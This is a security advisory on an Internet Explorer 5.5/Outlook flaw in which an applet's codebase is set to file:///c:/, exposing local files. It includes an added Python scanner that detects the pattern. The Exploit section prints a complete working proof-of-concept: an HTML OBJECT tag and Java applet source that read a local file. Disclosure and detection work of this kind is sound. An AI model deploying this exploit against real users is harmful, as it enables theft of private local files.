There is a security vulnerability in IE 5.5/Outlook/Outlook Express, which allows reading of local files, arbitrary Intranet URLs and local directory structure after viewing a web page or reading a malicious HTML message.
Credit:
The information has been provided by Georgi Guninski.
Details:
The problem lies in the ability to specify an arbitrary codebase for an applet loaded from an <OBJECT> tag together with a jar file. Applets may read URLs from their codebase and communicate with hosts from the same codebase, so whoever controls the codebase controls what the applet is allowed to read.
The following code:
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
Sets the applet's codebase to file:///c:/. This is not a Java language problem and supposedly not a problem in Microsoft's VM but rather a problem in the way codebase is set by IE.
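The pattern above (a CODEBASE that points somewhere other than the origin that actually supplies the classes, here file:///c:/) is easy to recognise in content before it reaches a client. The following scanner is an added example for this advisory, not code from Guninski's demonstration; the sample HTML embedded in it is constructed here (the first OBJECT mirrors javacodebase1.html, the second is a benign control whose codebase and archive share an origin), and the hostname example.test is an assumed placeholder.

```python
"""Flag <OBJECT CLASSID="JAVA:..."> embeddings whose CODEBASE is redirected away
from the archive that supplies the classes, the pattern used in the advisory.

Added example, not part of the original advisory; SAMPLE_HTML is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed test document: first OBJECT is the advisory's pattern, the second is a
# normal applet whose codebase and archive share one origin (example.test is assumed).
SAMPLE_HTML = """
<html><body>
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
<OBJECT CLASSID="JAVA:Hello.class" WIDTH=100>
<PARAM NAME="ARCHIVE" VALUE="http://example.test/applets/hello.jar">
<PARAM NAME="CODEBASE" VALUE="http://example.test/applets/">
</OBJECT>
</body></html>
"""


class AppletObjectParser(HTMLParser):
    """Collect every <OBJECT> with its CLASSID and the <PARAM> name/value pairs inside it."""

    def __init__(self):
        super().__init__()
        self.objects = []      # list of {"classid": str, "params": {name: value}}
        self._current = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values keep their case.
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"classid": a.get("classid", ""), "params": {}}
            # A CODEBASE attribute on the OBJECT tag itself is treated like the PARAM.
            if "codebase" in a:
                self._current["params"]["codebase"] = a["codebase"]
        elif tag == "param" and self._current is not None:
            name = a.get("name", "").lower()
            if name:
                self._current["params"][name] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None


def origin(url):
    """(scheme, host, port) of a URL: the triple the applet sandbox compares."""
    p = urlsplit(url.strip())
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)


def classify(obj):
    """Return the reasons an applet OBJECT is suspicious; empty list if it looks benign."""
    reasons = []
    if not obj["classid"].lower().startswith("java:"):
        return reasons
    codebase = obj["params"].get("codebase")
    archive = obj["params"].get("archive")
    if codebase is None:
        return reasons
    cb = origin(codebase)
    if cb[0] == "file":
        reasons.append("codebase is a file: URL (grants local file and directory reads)")
    if archive is not None and origin(archive) != cb:
        reasons.append("codebase origin %r differs from archive origin %r" % (cb, origin(archive)))
    return reasons


def scan_html(html):
    """Parse HTML and return [(classid, reasons)] for every flagged applet OBJECT."""
    p = AppletObjectParser()
    p.feed(html)
    p.close()
    return [(o["classid"], classify(o)) for o in p.objects if classify(o)]


if __name__ == "__main__":
    for classid, reasons in scan_html(SAMPLE_HTML):
        print(classid)
        for r in reasons:
            print("  -", r)
```

Run against SAMPLE_HTML this reports only the first OBJECT, with both a file: codebase and a codebase/archive origin mismatch; the control applet is not flagged. The mismatch check is deliberately independent of whether the client's VM enforces it, since the advisory's point is that IE sets the codebase from attacker-controlled markup.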
Exploit:
The code is:
---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------
--------gjavacodebase.java-------------------------------------------
import java.applet.Applet;
import java.awt.Graphics;
import java.io.InputStream;
import java.net.URL;
import java.util.StringTokenizer;
public class gjavacodebase extends Applet {
    String out = "";
    void print(String s) { out += s + "\n"; repaint(); }
    public void init() {
        try {
            // URL param is file:///c:/test.txt; the read is allowed only because IE set the codebase to file:///c:/
            URL u = new URL(getParameter("URL"));
            InputStream is = u.openStream();
            byte ba[] = new byte[1000];
            int l = is.read(ba);
            if (l < 0) l = 0;   // empty file
            String s1 = new String(ba, 0, l);
            print(u.toString());
            print(s1);
        } catch (Exception e) {
            print("Error: " + e);
        }
    }
    public void paint(Graphics g) {
        StringTokenizer t = new StringTokenizer(out, "\n");
        for (int y = 15; t.hasMoreTokens(); y += 15) g.drawString(t.nextToken(), 5, y);
    }
}
---------------------------------------------------------------------
Workaround:
Disable Java.
Demonstration:
A live demonstration is available at: http://www.guninski.com/javacodebase1.html